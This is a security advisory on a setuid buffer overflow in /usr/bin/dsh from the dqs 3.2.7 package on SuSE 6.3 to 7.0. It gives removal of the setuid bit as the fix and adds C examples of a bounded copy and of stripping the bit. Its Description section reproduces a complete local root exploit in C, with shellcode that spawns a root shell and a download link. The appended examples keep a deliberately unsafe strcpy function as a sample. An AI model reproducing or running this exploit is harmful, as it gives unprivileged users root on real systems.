Vulnerability
  dqs

Affected
  dqs 3.2.7 (SuSE 6.3, 6.4 and 7.0 ship dqs 3.2.7 by default; other distributions carrying the package may be affected as well)

Description
  'dex' reported a buffer overflow in /usr/bin/dsh from the dqs 3.2.7 package. If an over-long string is passed as the first argument, the program crashes with SIGSEGV; because dsh is installed setuid root, the overflow can be used by a local user to obtain a root shell. SuSE 6.3, 6.4 and 7.0 ship dqs 3.2.7 by default and are therefore vulnerable; other distributions may be too.

  The exploit can be downloaded from www.raza-mexicana.org/programas/programas/qsexp.c and is reproduced here:

/* - dqsexp.c - */
/********************************************************************/
/* /usr/bin/dsh (dqs 3.2.7 package) local root exploit.             */
/* SuSE 6.3, 6.4, and 7.0 are vulnerable.                           */
/* dex@raza-mexicana.org <> http://www.raza-mexicana.org            */
/* Greetings: dr_fdisk^, yield, vlad, deadsector, trovalz, fatal,   */
/* megaflop and all of raza. What a chore to write them all out XD. */
/* Special greetings to the espa~olete (NOP) :P, you know why.      */
/*                                                                  */
/* - dex@raza-mexicana.org <> http://www.raza-mexicana.org -        */
/********************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BUFFSIZE 2772   /* total payload length; overruns dsh's argument buffer   */
#define OFFSET   0      /* subtracted from the stack pointer to guess the landing address */
#define ALIGN    0      /* shifts the shellcode by a few bytes to fix dword alignment    */

/* Return the caller's stack pointer; the guessed return address is derived
 * from it. 32-bit x86 only, as is the shellcode below. */
unsigned long get_sp(void)
{
    unsigned long sp;
    __asm__("movl %%esp, %0" : "=r"(sp));
    return sp;
}

/* setreuid(0,0) (syscall 70) followed by execve("/bin/sh", ["/bin/sh"], NULL) (syscall 11) */
static char code[] = /* stolen from mount.c :P */
    "\x29\xc0"                      /* subl %eax, %eax       */
    "\xb0\x46"                      /* movb $70, %al         */
    "\x29\xdb"                      /* subl %ebx, %ebx       */
    "\xb3\x0c"                      /* movb $12, %bl         */
    "\x80\xeb\x0c"                  /* subb $12, %bl         */
    "\x89\xd9"                      /* movl %ebx, %ecx       */
    "\xcd\x80"                      /* int $0x80             */
    "\xeb\x18"                      /* jmp callz             */
    "\x5e"                          /* popl %esi             */
    "\x29\xc0"                      /* subl %eax, %eax       */
    "\x88\x46\x07"                  /* movb %al, 0x07(%esi)  */
    "\x89\x46\x0c"                  /* movl %eax, 0x0c(%esi) */
    "\x89\x76\x08"                  /* movl %esi, 0x08(%esi) */
    "\xb0\x0b"                      /* movb $0x0b, %al       */
    "\x87\xf3"                      /* xchgl %esi, %ebx      */
    "\x8d\x4b\x08"                  /* leal 0x08(%ebx), %ecx */
    "\x8d\x53\x0c"                  /* leal 0x0c(%ebx), %edx */
    "\xcd\x80"                      /* int $0x80             */
    "\xe8\xe3\xff\xff\xff"          /* call start            */
    "\x2f\x62\x69\x6e\x2f\x73\x68"; /* "/bin/sh"             */

int main(int argc, char **argv)
{
    int i;
    unsigned long addr;
    char *buffer;
    int offset = OFFSET;
    int buffsize = BUFFSIZE;
    int align = ALIGN;

    if (argc > 1) offset = atoi(argv[1]);
    if (argc > 2) align = atoi(argv[2]);
    if (argc > 3) buffsize = atoi(argv[3]);

    buffer = (char *)malloc(buffsize + 8);
    addr = get_sp() - offset;

    /* NOP sled over the whole buffer, so a slightly wrong addr still slides into the shellcode */
    for (i = 0; i < buffsize; i += 4)
        *(long *)&buffer[i] = 0x90909090;

    /* the last two dwords overwrite the saved return address with the guessed sled address */
    *(long *)&buffer[buffsize - 8] = addr;
    *(long *)&buffer[buffsize - 4] = addr;

    /* shellcode sits immediately below the return-address words */
    memcpy(buffer + buffsize - 8 - strlen(code) - align, code, strlen(code));
    buffer[buffsize] = '\0';   /* terminate the string execl() passes as argv[1] */

    printf("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n");
    printf("[*] /usr/bin/dsh(dqs 3.2.7 package) local root exploit.\n");
    printf("[*] - dex@raza-mexicana.org <> http://www.raza-mexicana.org - \n");
    printf("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\n");
    printf("[*] Address=0x%lx, Align=%d, Offset=%d\n", addr, align, offset);
    printf("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\n");
    printf("[*] Starting....\n");

    execl("/usr/bin/dsh", "dsh", buffer, "/etc/motd", NULL);
    return 0;
}

Solution
  SuSE confirmed the vulnerability and that the dqs package installs /usr/bin/dsh with the setuid bit set, but the package (part of the clustering series) is not installed by default. Removing the setuid bit is the correct fix. On SuSE 7.1, systems that set PERMISSION_SECURITY in /etc/rc.config to "secure local" (recommended for security-enhanced settings) are not vulnerable. On SuSE 7.1, in addition to removing the setuid bit with chmod, edit the /etc/permissions.* files as well so that they reflect the removed setuid bit. If you do not need the dqs package, simply remove it with

  rpm -e dqs

  SuSE will of course provide update packages as soon as possible. The original publisher (SCRI, Florida State University) no longer maintains DQS or employs its original author, but has also refused to relax the distribution restrictions, which makes it difficult to form a new developer community.
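The bug class behind the Description above, as an added example that is not part of the advisory or of the dqs sources: an unchecked copy of argv[1] into a fixed-size stack buffer beside a hardened copy that refuses over-long input. The buffer size HOSTBUF and the function names are assumptions for illustration; the page does not give dsh's real buffer size or code.

```c
/* Added example, not from the advisory or from dqs: the vulnerable
 * pattern (unchecked copy of an argument into a fixed stack buffer)
 * beside a hardened copy. HOSTBUF is an assumed size; dsh's real
 * buffer size is not given on the page. */
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define HOSTBUF 256   /* assumed capacity, not dsh's real figure */

/* Bounded string length (strnlen is not in strict C99). */
static size_t bounded_len(const char *s, size_t max)
{
    size_t n = 0;
    while (n < max && s[n] != '\0')
        n++;
    return n;
}

/* Vulnerable pattern: strcpy() stops only at the argument's NUL byte,
 * however far past `out` that lies. A ~2.7 KB argument therefore runs
 * over the saved frame pointer and return address, which is what the
 * repeated `addr` words at the end of the exploit buffer overwrite.
 * Kept here to read against the safe version; never feed it untrusted
 * input. */
int copy_host_unsafe(const char *arg, char out[HOSTBUF])
{
    strcpy(out, arg);
    return 0;
}

/* Hardened form: measure with a bound first, refuse anything that does
 * not fit together with its terminator, then copy a known number of
 * bytes. Returns 0 on success, -1 (errno = ENAMETOOLONG) on rejection. */
int copy_host_safe(const char *arg, char *out, size_t outsz)
{
    size_t n = bounded_len(arg, outsz);
    if (n >= outsz) {
        errno = ENAMETOOLONG;
        return -1;
    }
    memcpy(out, arg, n + 1);
    return 0;
}

/* 1 if `arg` would overflow a `bufsz`-byte buffer in the unsafe
 * variant, 0 if it fits together with its terminator. */
int would_overflow(const char *arg, size_t bufsz)
{
    return strlen(arg) + 1 > bufsz ? 1 : 0;
}

/* Builds a constructed argument of `arglen` 'A' bytes (the shape of the
 * exploit's padded string) and reports whether the safe copy into a
 * `bufsz`-byte buffer rejects it: 1 = rejected, 0 = accepted,
 * -1 = allocation failure. */
int safe_copy_rejects(size_t arglen, size_t bufsz)
{
    char *arg = malloc(arglen + 1);
    char *out = malloc(bufsz);
    int rc;
    if (!arg || !out) {
        free(arg);
        free(out);
        return -1;
    }
    memset(arg, 'A', arglen);
    arg[arglen] = '\0';
    rc = copy_host_safe(arg, out, bufsz) < 0 ? 1 : 0;
    free(arg);
    free(out);
    return rc;
}

int main(int argc, char **argv)
{
    char host[HOSTBUF];
    const char *arg = argc > 1 ? argv[1] : "node01";

    if (would_overflow(arg, sizeof host))
        printf("unsafe copy would overrun the buffer by %zu bytes\n",
               strlen(arg) + 1 - sizeof host);
    if (copy_host_safe(arg, host, sizeof host) < 0) {
        fprintf(stderr, "argument too long (%zu bytes, limit %zu)\n",
                strlen(arg), sizeof host - 1);
        return 1;
    }
    copy_host_unsafe(arg, host);   /* safe here: the length was checked above */
    printf("host: %s\n", host);
    return 0;
}
```

Run it with an argument of a few thousand bytes (for example the output of `perl -e 'print "A" x 2772'`) and the hardened path rejects the input where the unchecked strcpy() would have clobbered the stack.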
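The workaround from the Solution above as code, added here as an example that is neither the advisory's nor SuSE's: strip_setuid() does what `chmod u-s` does on a binary, and fix_permissions_text() clears the 4000 bit from the matching entry of a permissions file so the bit is not restored later. The "path owner.group mode" line layout assumed for /etc/permissions.* is an assumption taken from the page's mention of those files, not verified against a SuSE 7.1 install; the sample file content is constructed.

```c
/* Added example, not from the advisory or from SuSE: strip the setuid
 * bit from a binary and from the matching line of a permissions file.
 * The "path owner.group mode" layout of /etc/permissions.* is assumed. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* 1 if `path` carries the setuid bit, 0 if not, -1 if stat() fails. */
int has_setuid(const char *path)
{
    struct stat st;
    if (stat(path, &st) != 0)
        return -1;
    return (st.st_mode & S_ISUID) ? 1 : 0;
}

/* Clears only the setuid bit (`chmod u-s`). Returns 1 if the bit was
 * cleared, 0 if it was already clear, -1 on error. */
int strip_setuid(const char *path)
{
    struct stat st;
    if (stat(path, &st) != 0)
        return -1;
    if (!(st.st_mode & S_ISUID))
        return 0;
    return chmod(path, (st.st_mode & 07777) & ~S_ISUID) == 0 ? 1 : -1;
}

/* Rewrites one "path owner.group mode" line: if it names `target` and its
 * octal mode has the setuid bit, the bit is dropped; otherwise the line is
 * copied unchanged. Returns 1 if changed, 0 if not, -1 if `out` is too small. */
int fix_permissions_line(const char *line, const char *target,
                         char *out, size_t outsz)
{
    char path[256], owner[64];
    unsigned mode;

    if (sscanf(line, "%255s %63s %o", path, owner, &mode) == 3
        && strcmp(path, target) == 0 && (mode & S_ISUID)) {
        int n = snprintf(out, outsz, "%s %s %04o\n", path, owner,
                         mode & ~(unsigned)S_ISUID);
        return (n < 0 || (size_t)n >= outsz) ? -1 : 1;
    }
    if (strlen(line) >= outsz)
        return -1;
    strcpy(out, line);
    return 0;
}

/* Applies fix_permissions_line() to every line of `in`, writing the result
 * to `out`. Returns the number of entries changed, or -1 on overflow. */
int fix_permissions_text(const char *in, const char *target,
                         char *out, size_t outsz)
{
    int changed = 0;
    size_t used = 0;

    while (*in) {
        char line[512], fixed[512];
        const char *nl = strchr(in, '\n');
        size_t len = nl ? (size_t)(nl - in) + 1 : strlen(in);
        int r;
        if (len >= sizeof line)
            return -1;
        memcpy(line, in, len);
        line[len] = '\0';
        r = fix_permissions_line(line, target, fixed, sizeof fixed);
        if (r < 0 || used + strlen(fixed) >= outsz)
            return -1;
        memcpy(out + used, fixed, strlen(fixed));
        used += strlen(fixed);
        changed += r;
        in += len;
    }
    out[used] = '\0';
    return changed;
}

/* Constructed sample in the assumed layout; only the dsh entry should change. */
static const char SAMPLE_PERMISSIONS[] =
    "/usr/bin/passwd root.shadow 4755\n"
    "/usr/bin/dsh root.root 4755\n"
    "/bin/ls root.root 0755\n";

/* Runs the sample through fix_permissions_text(); returns the number of
 * changed entries only when the output is exactly what is expected, else -1. */
int demo_permissions_fix(void)
{
    char out[512];
    int changed = fix_permissions_text(SAMPLE_PERMISSIONS, "/usr/bin/dsh",
                                       out, sizeof out);
    const char *want = "/usr/bin/passwd root.shadow 4755\n"
                       "/usr/bin/dsh root.root 0755\n"
                       "/bin/ls root.root 0755\n";
    return strcmp(out, want) == 0 ? changed : -1;
}

/* Creates a throwaway file with mode 4755, strips the bit and checks each
 * step; returns 1 when the whole round trip behaves as expected. */
int demo_strip_roundtrip(void)
{
    char tmpl[] = "/tmp/dsh-demo-XXXXXX";
    int fd = mkstemp(tmpl), ok;
    if (fd < 0)
        return 0;
    ok = fchmod(fd, 04755) == 0 && has_setuid(tmpl) == 1
         && strip_setuid(tmpl) == 1 && has_setuid(tmpl) == 0
         && strip_setuid(tmpl) == 0;
    close(fd);
    unlink(tmpl);
    return ok ? 1 : 0;
}

int main(void)
{
    printf("permissions entries changed: %d\n", demo_permissions_fix());
    printf("round trip on temp file: %s\n", demo_strip_roundtrip() ? "ok" : "failed");
    return 0;
}
```

The two halves matter together: clearing the bit on the binary alone is undone the next time the permissions files are applied, and editing the files alone leaves the installed binary setuid until they are.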